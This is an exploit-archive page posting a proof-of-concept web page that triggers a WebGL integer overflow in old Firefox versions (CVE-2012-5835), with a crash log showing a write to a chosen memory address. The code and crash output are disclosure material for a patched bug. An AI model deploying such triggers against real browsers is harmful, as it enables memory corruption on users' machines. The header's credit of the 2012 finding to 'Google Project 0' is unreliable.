what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox WebGL Proof Of Concept

Mozilla Firefox WebGL Proof Of Concept
Posted Feb 15, 2017
Authored by Bikash Dash

Proof of concept code demonstrating a WebGL integer overflow from 2012 in Mozilla Firefox versions prior to 17 and ESR 10.x versions before 10.0.11.

tags | exploit, overflow, proof of concept
advisories | CVE-2012-5835
SHA-256 | 007ca774585a830b71b08631a7e5718fc0eb3a94767134d2128687b2e2c600e5
Download | Favorite | View

Mozilla Firefox WebGL Proof Of Concept

Change Mirror Download
# Exploit Title: Integer overflow happens WebGL system in Mozila Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: (Originally Found by Google Project 0 team)Bikash Dash
#Tested On:MAC OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps(Mozila)
<html>
  <head>
    <script>
      gl=document.createElement('canvas').getContext('experimental-webgl')
      var buf = gl.createBuffer()
      gl.bindBuffer(gl.ARRAY_BUFFER, buf)
      var magic = 0x12345678
      gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)
      gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)
      gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))
    </script>
  </head>
</html>
Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb  %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address.  Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html


Process:         firefox [3732]
Path:            /Applications/Firefox.app/Contents/MacOS/firefox
Identifier:      firefox
Version:         ??? (???)
Code Type:       X86-64 (Native)
Parent Process:  exc_handler [3731]

Date/Time:       2017-02-15 10:44:52.818 +0300
OS Version:      Mac OS X 10.8.1 (12B19)
Report Version:  9

Crashed Thread:  0  Dispatch queue: com.apple.main-thread

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_c.dylib               0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1   GLEngine                        0x000000010cfa9982 glBufferSubData_Exec + 856
2   XUL                             0x00000001020df955 0x10111a000 + 16537941
3   XUL                             0x000000010257424b 0x10111a000 + 21340747
4   XUL                             0x0000000102564622 0x10111a000 + 21276194
5   XUL                             0x0000000102573ae2 0x10111a000 + 21338850
6   XUL                             0x0000000102573ce9 0x10111a000 + 21339369
7   XUL                             0x0000000102573fe5 0x10111a000 + 21340133
8   XUL                             0x00000001024f2d2d 0x10111a000 + 20811053
9   XUL                             0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10  XUL                             0x000000010182121d 0x10111a000 + 7369245
11  XUL                             0x00000001015ef000 0x10111a000 + 5066752
12  XUL                             0x00000001015f0538 0x10111a000 + 5072184
13  XUL                             0x00000001015f117a 0x10111a000 + 5075322
14  XUL                             0x00000001015ee4bd 0x10111a000 + 5063869
15  XUL                             0x00000001019a41b6 0x10111a000 + 8954294
16  XUL                             0x00000001019a6285 0x10111a000 + 8962693
17  XUL                             0x00000001019aa94d 0x10111a000 + 8980813
18  XUL                             0x00000001021324f3 0x10111a000 + 16876787
19  XUL                             0x00000001020f1c0e 0x10111a000 + 16612366
20  XUL                             0x0000000101f5b009 0x10111a000 + 14946313
21  XUL                             0x0000000101f1f4bf 0x10111a000 + 14701759
22  com.apple.CoreFoundation        0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23  com.apple.CoreFoundation        0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24  com.apple.CoreFoundation        0x00007fff918204e5 __CFRunLoopRun + 789
25  com.apple.CoreFoundation        0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26  com.apple.HIToolbox             0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27  com.apple.HIToolbox             0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28  com.apple.HIToolbox             0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29  com.apple.AppKit                0x00007fff96591fa3 _DPSNextEvent + 685
30  com.apple.AppKit                0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31  XUL                             0x0000000101f1e942 0x10111a000 + 14698818
32  com.apple.AppKit                0x00007fff96588c03 -[NSApplication run] + 517
33  XUL                             0x0000000101f1ed2d 0x10111a000 + 14699821
34  XUL                             0x0000000101d867b4 0x10111a000 + 13027252
35  XUL                             0x0000000101121193 0x10111a000 + 29075
36  XUL                             0x0000000101125fbb 0x10111a000 + 49083
37  XUL                             0x00000001011264c3 XRE_main + 307
38  org.mozilla.firefox             0x0000000100001e15 0x100000000 + 7701
39  org.mozilla.firefox             0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
  rax: 0xffffffff0b4f3400  rbx: 0x000000011506ac00  rcx: 0x0000000000000000  rdx: 0x0000000000000001
  rdi: 0x0000000012345678  rsi: 0x0000000106e521d1  rbp: 0x00007fff5fbfb9d0  rsp: 0x00007fff5fbfb9d0
   r8: 0x0000000000000000   r9: 0x00007fff5fbfb970  r10: 0x000000010a50c5b0  r11: 0x0000000012345678
  r12: 0x0000000012345678  r13: 0x0000000113607b68  r14: 0x0000000113607b40  r15: 0x0000000000000001
  rip: 0x00007fff92c82a41  rfl: 0x0000000000010206  cr2: 0x0000000012345678
Logical CPU: 2
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close